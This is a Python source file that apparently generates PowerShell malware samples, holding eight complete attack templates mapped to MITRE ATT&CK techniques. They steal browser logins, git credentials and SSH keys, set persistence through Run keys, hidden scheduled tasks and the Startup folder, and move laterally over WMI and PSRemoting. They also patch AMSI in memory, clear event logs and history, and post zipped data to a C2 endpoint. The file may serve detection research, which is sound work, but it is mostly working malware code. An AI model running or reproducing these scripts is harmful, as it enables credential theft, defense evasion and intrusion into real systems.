#!/usr/bin/env python3
"""
PowerShell 样本生成器 - Sample Generator v2.0

功能:
- Windows 凭据窃取
- 持久化 (注册表/任务计划)
- 横向移动 (WMI/PSRemoting)
- 防御规避 (AMSI 绕过)
- 数据外传
"""

from pathlib import Path
from typing import Dict, List
import random

from .base_generator import BaseGenerator, MaliciousSample


class PowerShellGenerator(BaseGenerator):
    """PowerShell 恶意样本生成器"""
    
    ATTACK_TYPES = [
        'credential_theft',     # 凭据窃取
        'persistence',          # 持久化
        'lateral_movement',     # 横向移动
        'defense_evasion',      # 防御规避
        'data_exfil',          # 数据外传
        'reconnaissance',      # 侦察
        'privilege_escalation', # 权限提升
        'collection',          # 数据收集
    ]
    
    def __init__(self, config: Dict = None):
        super().__init__(language='powershell', config=config)
    
    def _get_powershell_templates(self) -> Dict[str, str]:
        """获取 PowerShell 模板"""
        return {
            'credential_theft': '''# Credential Theft - PowerShell
# Generated by Sample Generator v2.0
# Attack Type: Credential Theft
# MITRE ATT&CK: T1003.001 (LSASS Memory)

function Get-CredentialData {
    $creds = @()
    
    # Windows 凭据管理器
    $credPath = "$env:LOCALAPPDATA\\Microsoft\\Credentials"
    if (Test-Path $credPath) {
        foreach ($file in Get-ChildItem $credPath -Recurse) {
            $creds += @{
                Type = 'Windows Credential'
                Path = $file.FullName
                Modified = $file.LastWriteTime
            }
        }
    }
    
    # Git 凭据
    $gitCredPath = "$env:USERPROFILE\\.git-credentials"
    if (Test-Path $gitCredPath) {
        $content = Get-Content $gitCredPath -Raw
        $creds += @{
            Type = 'Git Credential'
            Path = $gitCredPath
            Content = $content
        }
    }
    
    # Chrome 登录数据
    $chromePath = "$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data"
    if (Test-Path $chromePath) {
        $creds += @{
            Type = 'Chrome Login'
            Path = $chromePath
        }
    }
    
    # Firefox 登录数据
    $firefoxPath = "$env:APPDATA\\Mozilla\\Firefox\\Profiles"
    if (Test-Path $firefoxPath) {
        foreach ($profile in Get-ChildItem $firefoxPath) {
            $logins = "$($profile.FullName)\\logins.json"
            if (Test-Path $logins) {
                $creds += @{
                    Type = 'Firefox Login'
                    Path = $logins
                }
            }
        }
    }
    
    return $creds
}

function Get-SSHKeys {
    $sshPath = "$env:USERPROFILE\\.ssh"
    $keys = @()
    
    if (Test-Path $sshPath) {
        foreach ($key in Get-ChildItem $sshPath) {
            if ($key.Name -match 'id_(rsa|ed25519|dsa)') {
                $content = Get-Content $key.FullName -Raw
                $keys += @{
                    Type = 'SSH Private Key'
                    File = $key.Name
                    Content = $content
                }
            }
        }
    }
    
    return $keys
}

function Export-Credentials {
    param(
        [string]$OutputPath = "$env:TEMP\\credentials.txt"
    )
    
    $allCreds = Get-CredentialData
    $sshKeys = Get-SSHKeys
    
    $report = @{
        Timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss"
        Hostname = $env:COMPUTERNAME
        Username = $env:USERNAME
        Credentials = $allCreds
        SSHKeys = $sshKeys
    }
    
    $report | ConvertTo-Json -Depth 10 | Out-File $OutputPath -Encoding UTF8
    Write-Host "Credentials exported to: $OutputPath"
    
    return $OutputPath
}

function Main {
    Write-Host "============================================"
    Write-Host "Credential Theft Module v2.0"
    Write-Host "============================================"
    Write-Host ""
    
    Write-Host "[*] Collecting Windows credentials..."
    $winCreds = Get-CredentialData
    Write-Host "    Found $($winCreds.Count) credential sources"
    
    Write-Host "[*] Collecting SSH keys..."
    $sshKeys = Get-SSHKeys
    Write-Host "    Found $($sshKeys.Count) SSH keys"
    
    Write-Host "[*] Exporting data..."
    $output = Export-Credentials
    Write-Host "    Exported to: $output"
    
    Write-Host ""
    Write-Host "============================================"
    Write-Host "Credential theft complete!"
    Write-Host "============================================"
}

# Execute
Main
''',
            
            'persistence': '''# Persistence - PowerShell
# Generated by Sample Generator v2.0
# Attack Type: Persistence
# MITRE ATT&CK: T1547.001 (Registry Run Keys)

function Add-RegistryPersistence {
    param(
        [string]$Name = "WindowsUpdate",
        [string]$Path = $MyInvocation.MyCommand.Path
    )
    
    $regPath = "HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
    
    if (!(Test-Path $regPath)) {
        New-Item -Path $regPath -Force | Out-Null
    }
    
    Set-ItemProperty -Path $regPath -Name $Name -Value $Path -Force
    
    Write-Host "Registry persistence added: $Name"
    Write-Host "  Path: $regPath"
    Write-Host "  Value: $Path"
}

function Add-ScheduledTaskPersistence {
    param(
        [string]$TaskName = "SystemUpdate",
        [string]$ScriptPath = $MyInvocation.MyCommand.Path,
        [string]$Trigger = "AtLogon"
    )
    
    $action = New-ScheduledTaskAction -Execute "PowerShell.exe" `
        -Argument "-NoProfile -WindowStyle Hidden -File `"$ScriptPath`""
    
    if ($Trigger -eq "AtLogon") {
        $trigger = New-ScheduledTaskTrigger -AtLogon
    } elseif ($Trigger -eq "AtStartup") {
        $trigger = New-ScheduledTaskTrigger -AtStartup
    } else {
        $trigger = New-ScheduledTaskTrigger -Daily -At "9am"
    }
    
    $principal = New-ScheduledTaskPrincipal -UserId $env:USERNAME -LogonType S4U
    $settings = New-ScheduledTaskSettingsSet -Hidden -AllowStartIfOnBatteries
    
    Register-ScheduledTask -TaskName $TaskName `
        -Action $action `
        -Trigger $trigger `
        -Principal $principal `
        -Settings $settings `
        -Force | Out-Null
    
    Write-Host "Scheduled task persistence added: $TaskName"
    Write-Host "  Trigger: $Trigger"
}

function Add-StartupFolderPersistence {
    param(
        [string]$Name = "UpdateHelper.ps1",
        [string]$ScriptPath = $MyInvocation.MyCommand.Path
    )
    
    $startupPath = [Environment]::GetFolderPath("Startup")
    $targetPath = Join-Path $startupPath $Name
    
    Copy-Item $ScriptPath $targetPath -Force
    
    Write-Host "Startup folder persistence added"
    Write-Host "  Path: $targetPath"
}

function Test-Persistence {
    Write-Host "Testing persistence mechanisms..."
    
    $regPath = "HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
    if (Test-Path $regPath) {
        $values = Get-ItemProperty $regPath
        Write-Host "  Registry Run keys: $($values.PSObject.Properties.Count)"
    }
    
    $tasks = Get-ScheduledTask -ErrorAction SilentlyContinue
    if ($tasks) {
        Write-Host "  Scheduled tasks: $($tasks.Count)"
    }
    
    $startupPath = [Environment]::GetFolderPath("Startup")
    $files = Get-ChildItem $startupPath -ErrorAction SilentlyContinue
    if ($files) {
        Write-Host "  Startup files: $($files.Count)"
    }
}

function Main {
    Write-Host "============================================"
    Write-Host "Persistence Module v2.0"
    Write-Host "============================================"
    Write-Host ""
    
    $scriptPath = $MyInvocation.MyCommand.Path
    
    Write-Host "[*] Adding registry persistence..."
    Add-RegistryPersistence -Name "WindowsUpdate" -Path $scriptPath
    
    Write-Host "[*] Adding scheduled task persistence..."
    Add-ScheduledTaskPersistence -TaskName "SystemUpdate" -ScriptPath $scriptPath
    
    Write-Host "[*] Adding startup folder persistence..."
    Add-StartupFolderPersistence -Name "UpdateHelper.ps1" -ScriptPath $scriptPath
    
    Write-Host ""
    Write-Host "[*] Testing persistence..."
    Test-Persistence
    
    Write-Host ""
    Write-Host "============================================"
    Write-Host "Persistence established!"
    Write-Host "============================================"
}

# Execute
Main
''',
            
            'lateral_movement': '''# Lateral Movement - PowerShell
# Generated by Sample Generator v2.0
# Attack Type: Lateral Movement
# MITRE ATT&CK: T1021.006 (WMI)

function Invoke-WMICommand {
    param(
        [string]$ComputerName,
        [string]$Command
    )
    
    try {
        $result = Invoke-WmiMethod -ComputerName $ComputerName `
            -Class Win32_Process `
            -Name Create `
            -ArgumentList "cmd.exe /c $Command"
        
        if ($result.ReturnValue -eq 0) {
            Write-Host "  Command executed successfully on $ComputerName"
            return $true
        } else {
            Write-Host "  Failed to execute on $ComputerName (Return: $($result.ReturnValue))"
            return $false
        }
    } catch {
        Write-Host "  Error on $ComputerName : $_"
        return $false
    }
}

function Invoke-PSRemoting {
    param(
        [string]$ComputerName,
        [string]$ScriptBlock
    )
    
    try {
        $session = New-PSSession -ComputerName $ComputerName -ErrorAction Stop
        $result = Invoke-Command -Session $session -ScriptBlock {
            Invoke-Expression $using:ScriptBlock
        }
        Remove-PSSession $session
        
        Write-Host "  PSRemoting successful on $ComputerName"
        return $result
    } catch {
        Write-Host "  PSRemoting failed on $ComputerName : $_"
        return $null
    }
}

function Get-NetworkComputers {
    Write-Host "[*] Discovering network computers..."
    
    $computers = @()
    
    # Active Directory (if available)
    try {
        Import-Module ActiveDirectory -ErrorAction Stop
        $computers += Get-ADComputer -Filter * | Select-Object -ExpandProperty Name
        Write-Host "  Found $($computers.Count) computers via AD"
    } catch {
        Write-Host "  AD not available"
    }
    
    # Network scanning
    $subnet = "192.168.1"
    for ($i = 1; $i -le 254; $i++) {
        $ip = "$subnet.$i"
        if (Test-Connection -ComputerName $ip -Count 1 -Quiet -ErrorAction SilentlyContinue) {
            try {
                $name = [System.Net.Dns]::GetHostEntry($ip).HostName
                $computers += $name
            } catch {
                $computers += $ip
            }
        }
    }
    
    Write-Host "  Total discovered: $($computers.Count)"
    return $computers | Select-Object -Unique
}

function Invoke-LateralMovement {
    param(
        [string[]]$TargetComputers,
        [string]$Payload
    )
    
    $results = @()
    
    foreach ($computer in $TargetComputers) {
        Write-Host "[*] Attempting lateral movement to: $computer"
        
        # Try WMI
        $wmiResult = Invoke-WMICommand -ComputerName $computer -Command $Payload
        if ($wmiResult) {
            $results += @{Computer=$computer; Method='WMI'; Success=$true}
            continue
        }
        
        # Try PSRemoting
        $psResult = Invoke-PSRemoting -ComputerName $computer -ScriptBlock $Payload
        if ($psResult) {
            $results += @{Computer=$computer; Method='PSRemoting'; Success=$true}
            continue
        }
        
        $results += @{Computer=$computer; Method='All'; Success=$false}
    }
    
    return $results
}

function Main {
    Write-Host "============================================"
    Write-Host "Lateral Movement Module v2.0"
    Write-Host "============================================"
    Write-Host ""
    
    # Discovery
    $computers = Get-NetworkComputers
    Write-Host ""
    
    if ($computers.Count -eq 0) {
        Write-Host "No target computers found. Exiting."
        return
    }
    
    # Payload (example: whoami)
    $payload = "whoami"
    Write-Host "[*] Executing payload: $payload"
    Write-Host ""
    
    # Lateral movement
    $results = Invoke-LateralMovement -TargetComputers $computers -Payload $payload
    
    # Summary
    Write-Host ""
    Write-Host "============================================"
    Write-Host "Lateral Movement Summary"
    Write-Host "============================================"
    
    $success = $results | Where-Object { $_.Success }
    $failed = $results | Where-Object { !$_.Success }
    
    Write-Host "Successful: $($success.Count)"
    Write-Host "Failed: $($failed.Count)"
}

# Execute
Main
''',
            
            'defense_evasion': '''# Defense Evasion - PowerShell
# Generated by Sample Generator v2.0
# Attack Type: Defense Evasion
# MITRE ATT&CK: T1562.001 (Disable Security Tools)

function Disable-AMSI {
    Write-Host "[*] Attempting to disable AMSI..."
    
    $amsiPatch = @"
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string lpFileName);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
"@
    
    try {
        $assembly = [System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms')
        Add-Type -MemberDefinition $amsiPatch -Name AMSI -Namespace Win32
        
        $LoadLibrary = [Win32.AMSI]::LoadLibrary("amsi.dll")
        $GetProcAddress = [Win32.AMSI]::GetProcAddress($LoadLibrary, "AmsiScanBuffer")
        
        $oldProtect = 0
        [Win32.AMSI]::VirtualProtect($GetProcAddress, [uint32]5, 0x40, [ref]$oldProtect)
        
        $patch = [Byte[]] @(0x31, 0xC0, 0x50, 0xC3)
        [System.Runtime.InteropServices.Marshal]::Copy($patch, 0, $GetProcAddress, 4)
        
        Write-Host "  AMSI disabled successfully"
        return $true
    } catch {
        Write-Host "  AMSI disable failed: $_"
        return $false
    }
}

function Clear-EventLogs {
    param(
        [string[]]$LogNames = @('Security', 'System', 'Application')
    )
    
    Write-Host "[*] Clearing event logs..."
    
    foreach ($log in $LogNames) {
        try {
            $logPath = Get-EventLog -List | Where-Object { $_.Log -eq $log }
            if ($logPath) {
                Clear-EventLog -LogName $log
                Write-Host "  Cleared: $log"
            }
        } catch {
            Write-Host "  Failed to clear $log : $_"
        }
    }
}

function Remove-PowerShellHistory {
    Write-Host "[*] Removing PowerShell history..."
    
    $historyPath = "$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt"
    
    if (Test-Path $historyPath) {
        try {
            Remove-Item $historyPath -Force
            Write-Host "  PowerShell history cleared"
        } catch {
            Write-Host "  Failed to clear history: $_"
        }
    }
}

function Test-DefenseStatus {
    Write-Host "[*] Checking defense status..."
    
    # Check AMSI
    try {
        $testScript = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').GetValue($null)
        Write-Host "  AMSI Status: $('Disabled' -eq $testScript)"
    } catch {
        Write-Host "  AMSI Status: Unknown"
    }
    
    # Check Windows Defender
    try {
        $defender = Get-MpPreference
        Write-Host "  Windows Defender: Enabled"
        Write-Host "    Real-time monitoring: $($defender.DisableRealtimeMonitoring)"
    } catch {
        Write-Host "  Windows Defender: Not available"
    }
}

function Main {
    Write-Host "============================================"
    Write-Host "Defense Evasion Module v2.0"
    Write-Host "============================================"
    Write-Host ""
    
    Write-Host "[*] Checking current defense status..."
    Test-DefenseStatus
    Write-Host ""
    
    Write-Host "[*] Attempting to disable AMSI..."
    $amsiResult = Disable-AMSI
    
    Write-Host "[*] Clearing event logs..."
    Clear-EventLogs
    
    Write-Host "[*] Removing PowerShell history..."
    Remove-PowerShellHistory
    
    Write-Host ""
    Write-Host "[*] Final defense status..."
    Test-DefenseStatus
    
    Write-Host ""
    Write-Host "============================================"
    Write-Host "Defense evasion complete!"
    Write-Host "============================================"
}

# Execute
Main
''',
            
            'data_exfil': '''# Data Exfiltration - PowerShell
# Generated by Sample Generator v2.0
# Attack Type: Data Exfiltration
# MITRE ATT&CK: T1041 (Exfiltration Over C2 Channel)

function Collect-SensitiveData {
    $data = @{
        SystemInfo = @{}
        Files = @()
        Credentials = @()
        Network = @{}
    }
    
    # System info
    $data.SystemInfo = @{
        Hostname = $env:COMPUTERNAME
        Username = $env:USERNAME
        OS = (Get-WmiObject Win32_OperatingSystem).Caption
        Architecture = $env:PROCESSOR_ARCHITECTURE
        Domain = $env:USERDOMAIN
    }
    
    # Network info
    $data.Network = @{
        IPConfig = ipconfig | Out-String
        ARP = arp -a | Out-String
        Netstat = netstat -an | Out-String
    }
    
    # Sensitive files
    $sensitivePaths = @(
        "$env:USERPROFILE\\Documents",
        "$env:USERPROFILE\\Desktop",
        "$env:USERPROFILE\\Downloads"
    )
    
    foreach ($path in $sensitivePaths) {
        if (Test-Path $path) {
            $files = Get-ChildItem $path -Recurse -File |
                Where-Object { $_.Extension -in @('.docx', '.xlsx', '.pptx', '.pdf', '.txt') } |
                Select-Object -First 20 FullName, Length, LastWriteTime
            $data.Files += $files
        }
    }
    
    # Credentials
    $credPaths = @(
        "$env:LOCALAPPDATA\\Microsoft\\Credentials",
        "$env:USERPROFILE\\.ssh",
        "$env:USERPROFILE\\.git-credentials"
    )
    
    foreach ($path in $credPaths) {
        if (Test-Path $path) {
            $data.Credentials += @{
                Path = $path
                Files = (Get-ChildItem $path -Recurse | Select-Object Name).Name
            }
        }
    }
    
    return $data
}

function Compress-Data {
    param(
        [object]$Data,
        [string]$OutputPath = "$env:TEMP\\exfil_data.zip"
    )
    
    $jsonPath = "$env:TEMP\\exfil_data.json"
    $Data | ConvertTo-Json -Depth 10 | Out-File $jsonPath -Encoding UTF8
    
    Add-Type -Assembly System.IO.Compression.FileSystem
    $compression = [System.IO.Compression.CompressionLevel]::Optimal
    
    [System.IO.Compression.ZipFile]::CreateFromDirectory(
        (Split-Path $jsonPath),
        $OutputPath,
        $compression,
        $false
    )
    
    Remove-Item $jsonPath -Force
    
    return $OutputPath
}

function Send-ToC2 {
    param(
        [string]$FilePath,
        [string]$C2Url = "http://127.0.0.1:8080/collect"
    )
    
    try {
        $fileBytes = [System.IO.File]::ReadAllBytes($FilePath)
        $base64 = [Convert]::ToBase64String($fileBytes)
        
        $body = @{
            data = $base64
            filename = (Split-Path $FilePath -Leaf)
            timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss"
        } | ConvertTo-Json
        
        Invoke-RestMethod -Uri $C2Url -Method POST -Body $body -ContentType "application/json" -TimeoutSec 30
        
        Write-Host "  Data sent to C2 successfully"
        return $true
    } catch {
        Write-Host "  Failed to send to C2: $_"
        return $false
    }
}

function Main {
    Write-Host "============================================"
    Write-Host "Data Exfiltration Module v2.0"
    Write-Host "============================================"
    Write-Host ""
    
    Write-Host "[*] Collecting sensitive data..."
    $data = Collect-SensitiveData
    
    Write-Host "  System info collected"
    Write-Host "  Files: $($data.Files.Count) items"
    Write-Host "  Credentials: $($data.Credentials.Count) sources"
    Write-Host ""
    
    Write-Host "[*] Compressing data..."
    $zipPath = Compress-Data -Data $data
    $size = (Get-Item $zipPath).Length
    Write-Host "  Compressed to: $zipPath"
    Write-Host "  Size: $([math]::Round($size / 1KB, 2)) KB"
    Write-Host ""
    
    Write-Host "[*] Attempting to exfiltrate to C2..."
    $C2_URL = "http://127.0.0.1:8080/collect"
    Write-Host "  C2 URL: $C2_URL"
    
    $result = Send-ToC2 -FilePath $zipPath -C2Url $C2_URL
    
    if ($result) {
        Write-Host "  Exfiltration successful"
        Remove-Item $zipPath -Force
    } else {
        Write-Host "  Exfiltration failed (expected in test)"
    }
    
    Write-Host ""
    Write-Host "============================================"
    Write-Host "Exfiltration complete!"
    Write-Host "============================================"
}

# Execute
Main
''',
            
            'reconnaissance': '''# Reconnaissance - PowerShell
# Generated by Sample Generator v2.0
# Attack Type: Reconnaissance
# MITRE ATT&CK: T1592 (Gather Victim Host Information)

function Get-SystemInfo {
    Write-Host "[*] Collecting system information..."
    
    $info = @{
        Hostname = $env:COMPUTERNAME
        Username = $env:USERNAME
        OS = (Get-WmiObject Win32_OperatingSystem).Caption
        Architecture = $env:PROCESSOR_ARCHITECTURE
        Memory = [math]::Round((Get-WmiObject Win32_ComputerSystem).TotalPhysicalMemory / 1GB, 2)
        CPU = (Get-WmiObject Win32_Processor).Name
        Domain = $env:USERDOMAIN
    }
    
    return $info
}

function Get-NetworkInfo {
    Write-Host "[*] Collecting network information..."
    
    $info = @{
        IPAddress = (Get-NetIPAddress -AddressFamily IPv4 | Where-Object { $_.InterfaceAlias -notlike "*Loopback*" }).IPAddress
        DefaultGateway = (Get-NetRoute -DestinationPrefix "0.0.0.0/0").NextHop
        DNS = (Get-DnsClientServerAddress).ServerAddresses
        ARP = arp -a
        Netstat = netstat -an
    }
    
    return $info
}

function Get-UserInformation {
    Write-Host "[*] Collecting user information..."
    
    $users = Get-LocalUser | Select-Object Name, Enabled, LastLogon
    $groups = Get-LocalGroup | Select-Object Name, SID
    $adminMembers = Get-LocalGroupMember -Name "Administrators"
    
    return @{
        Users = $users
        Groups = $groups
        Administrators = $adminMembers
    }
}

function Get-InstalledSoftware {
    Write-Host "[*] Collecting installed software..."
    
    $software = Get-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* |
        Where-Object { $_.DisplayName } |
        Select-Object DisplayName, DisplayVersion, Publisher, InstallDate |
        Sort-Object DisplayName
    
    return $software
}

function Get-RunningProcesses {
    Write-Host "[*] Collecting running processes..."
    
    $processes = Get-Process |
        Select-Object Name, Id, CPU, WorkingSet, Path |
        Sort-Object CPU -Descending |
        Select-Object -First 30
    
    return $processes
}

function Get-ScheduledTasks {
    Write-Host "[*] Collecting scheduled tasks..."
    
    $tasks = Get-ScheduledTask |
        Where-Object { $_.State -eq 'Ready' } |
        Select-Object TaskName, State, LastRunTime, NextRunTime |
        Sort-Object TaskName
    
    return $tasks
}

function Export-ReconData {
    param(
        [string]$OutputPath = "$env:TEMP\\recon_data.json"
    )
    
    $recon = @{
        Timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss"
        System = Get-SystemInfo
        Network = Get-NetworkInfo
        Users = Get-UserInformation
        Software = Get-InstalledSoftware
        Processes = Get-RunningProcesses
        Tasks = Get-ScheduledTasks
    }
    
    $recon | ConvertTo-Json -Depth 10 | Out-File $OutputPath -Encoding UTF8
    
    return $OutputPath
}

function Main {
    Write-Host "============================================"
    Write-Host "Reconnaissance Module v2.0"
    Write-Host "============================================"
    Write-Host ""
    
    Write-Host "[*] Starting reconnaissance..."
    Write-Host ""
    
    $system = Get-SystemInfo
    Write-Host "  Hostname: $($system.Hostname)"
    Write-Host "  OS: $($system.OS)"
    Write-Host "  Memory: $($system.Memory) GB"
    Write-Host ""
    
    Write-Host "[*] Exporting reconnaissance data..."
    $output = Export-ReconData
    Write-Host "  Output: $output"
    
    Write-Host ""
    Write-Host "============================================"
    Write-Host "Reconnaissance complete!"
    Write-Host "============================================"
}

# Execute
Main
''',
            
            'privilege_escalation': '''# Privilege Escalation - PowerShell
# Generated by Sample Generator v2.0
# Attack Type: Privilege Escalation
# MITRE ATT&CK: T1548 (Abuse Elevation Control Mechanism)

function Test-Administrator {
    $currentUser = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object Security.Principal.WindowsPrincipal($currentUser)
    return $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
}

function Get-ServicePermissions {
    Write-Host "[*] Checking service permissions..."
    
    $services = Get-Service | Where-Object { $_.Status -eq 'Running' }
    
    foreach ($service in $services) {
        try {
            $acl = Get-Acl -Path "HKLM:\\SYSTEM\\CurrentControlSet\\Services\\$($service.Name)"
            $rules = $acl.Access | Where-Object {
                $_.FileSystemRights -match 'ChangeConfig|Start|Stop' -and
                $_.IdentityReference -notmatch 'SYSTEM|Administrators'
            }
            
            if ($rules) {
                Write-Host "  Vulnerable service: $($service.Name)"
                foreach ($rule in $rules) {
                    Write-Host "    $($rule.IdentityReference): $($rule.FileSystemRights)"
                }
            }
        } catch {
            # Access denied
        }
    }
}

function Get-UnquotedServicePath {
    Write-Host "[*] Checking for unquoted service paths..."
    
    $services = Get-WmiObject Win32_Service |
        Where-Object { $_.PathName -and $_.PathName -notmatch '^".*"$' -and $_.PathName -match ' ' }
    
    foreach ($service in $services) {
        Write-Host "  Unquoted path: $($service.Name)"
        Write-Host "    Path: $($service.PathName)"
    }
    
    return $services
}

function Get-WeakRegistryPermissions {
    Write-Host "[*] Checking weak registry permissions..."
    
    $runKeys = @(
        "HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
        "HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
    )
    
    foreach ($key in $runKeys) {
        try {
            $acl = Get-Acl $key
            $rules = $acl.Access | Where-Object {
                $_.IdentityReference -notmatch 'SYSTEM|Administrators'
            }
            
            if ($rules) {
                Write-Host "  Weak permissions on: $key"
                foreach ($rule in $rules) {
                    Write-Host "    $($rule.IdentityReference): $($rule.RegistryRights)"
                }
            }
        } catch {
            # Access denied
        }
    }
}

function Get-SudoMisconfiguration {
    Write-Host "[*] Checking for sudo misconfigurations..."
    
    # Check if sudo is available (WSL)
    if (Get-Command sudo -ErrorAction SilentlyContinue) {
        try {
            $sudoers = sudo -n cat /etc/sudoers 2>$null
            if ($sudoers) {
                Write-Host "  Sudo access detected"
                $nopasswd = $sudoers -match 'NOPASSWD'
                if ($nopasswd) {
                    Write-Host "  NOPASSWD rule found!"
                    Write-Host "    $nopasswd"
                }
            }
        } catch {
            # No sudo access
        }
    }
}

function Main {
    Write-Host "============================================"
    Write-Host "Privilege Escalation Module v2.0"
    Write-Host "============================================"
    Write-Host ""
    
    $isAdmin = Test-Administrator
    Write-Host "[*] Current user is administrator: $isAdmin"
    Write-Host ""
    
    if (!$isAdmin) {
        Write-Host "[*] Checking for privilege escalation vectors..."
        Write-Host ""
        
        Get-ServicePermissions
        Write-Host ""
        
        Get-UnquotedServicePath
        Write-Host ""
        
        Get-WeakRegistryPermissions
        Write-Host ""
        
        Get-SudoMisconfiguration
    } else {
        Write-Host "[*] Already running as administrator"
        Write-Host "[*] Skipping escalation checks"
    }
    
    Write-Host ""
    Write-Host "============================================"
    Write-Host "Privilege escalation analysis complete!"
    Write-Host "============================================"
}

# Execute
Main
''',
            
            'collection': '''# Collection - PowerShell
# Generated by Sample Generator v2.0
# Attack Type: Collection
# MITRE ATT&CK: T1005 (Data from Local System)

function Find-SensitiveFiles {
    param(
        [string[]]$SearchPaths = @("$env:USERPROFILE", "$env:PUBLIC"),
        [string[]]$Extensions = @('.docx', '.xlsx', '.pptx', '.pdf', '.txt', '.ps1', '.bat')
    )
    
    Write-Host "[*] Searching for sensitive files..."
    
    $files = @()
    
    foreach ($path in $SearchPaths) {
        if (Test-Path $path) {
            foreach ($ext in $Extensions) {
                $found = Get-ChildItem -Path $path -Recurse -Filter "*$ext" -File -ErrorAction SilentlyContinue |
                    Select-Object FullName, Length, LastWriteTime
                $files += $found
            }
        }
    }
    
    Write-Host "  Found $($files.Count) files"
    return $files
}

function Get-BrowserData {
    Write-Host "[*] Collecting browser data..."
    
    $browsers = @{
        Chrome = "$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default"
        Firefox = "$env:APPDATA\\Mozilla\\Firefox\\Profiles"
        Edge = "$env:LOCALAPPDATA\\Microsoft\\Edge\\User Data\\Default"
    }
    
    $data = @{}
    
    foreach ($browser in $browsers.GetEnumerator()) {
        if (Test-Path $browser.Value) {
            $data[$browser.Key] = @{
                Path = $browser.Value
                Exists = $true
                History = Test-Path "$($browser.Value)\\History"
                Cookies = Test-Path "$($browser.Value)\\Cookies"
                Logins = Test-Path "$($browser.Value)\\Login Data"
            }
        }
    }
    
    return $data
}

function Get-MailData {
    Write-Host "[*] Collecting mail data..."
    
    $mail = @{}
    
    # Outlook
    $outlookPath = "$env:LOCALAPPDATA\\Microsoft\\Outlook"
    if (Test-Path $outlookPath) {
        $pstFiles = Get-ChildItem $outlookPath -Filter "*.pst"
        $mail.Outlook = @{
            Path = $outlookPath
            PSTFiles = $pstFiles.Count
        }
    }
    
    # Thunderbird
    $thunderbirdPath = "$env:APPDATA\\Thunderbird\\Profiles"
    if (Test-Path $thunderbirdPath) {
        $mail.Thunderbird = @{
            Path = $thunderbirdPath
            Exists = $true
        }
    }
    
    return $mail
}

function Export-Collection {
    param(
        [string]$OutputPath = "$env:TEMP\\collected_data.json"
    )
    
    $collection = @{
        Timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss"
        Files = Find-SensitiveFiles
        Browsers = Get-BrowserData
        Mail = Get-MailData
    }
    
    $collection | ConvertTo-Json -Depth 10 | Out-File $OutputPath -Encoding UTF8
    
    return $OutputPath
}

function Main {
    Write-Host "============================================"
    Write-Host "Collection Module v2.0"
    Write-Host "============================================"
    Write-Host ""
    
    Write-Host "[*] Starting data collection..."
    Write-Host ""
    
    $files = Find-SensitiveFiles
    Write-Host "  Sensitive files: $($files.Count)"
    Write-Host ""
    
    $browsers = Get-BrowserData
    Write-Host "  Browser profiles found: $($browsers.Count)"
    Write-Host ""
    
    $mail = Get-MailData
    Write-Host "  Mail clients found: $($mail.Count)"
    Write-Host ""
    
    Write-Host "[*] Exporting collection data..."
    $output = Export-Collection
    Write-Host "  Output: $output"
    
    Write-Host ""
    Write-Host "============================================"
    Write-Host "Collection complete!"
    Write-Host "============================================"
}

# Execute
Main
'''
        }
    
    def generate(self, attack_type: str, variation: int = 0, obfuscation_level: int = 1):
        """生成 PowerShell 样本"""
        return super().generate(attack_type, variation, obfuscation_level)
